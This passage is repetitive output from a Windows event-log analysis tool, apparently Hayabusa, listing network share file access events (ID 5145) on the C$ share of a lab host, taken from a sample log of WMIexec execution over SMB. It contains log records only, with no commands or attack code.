Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.238 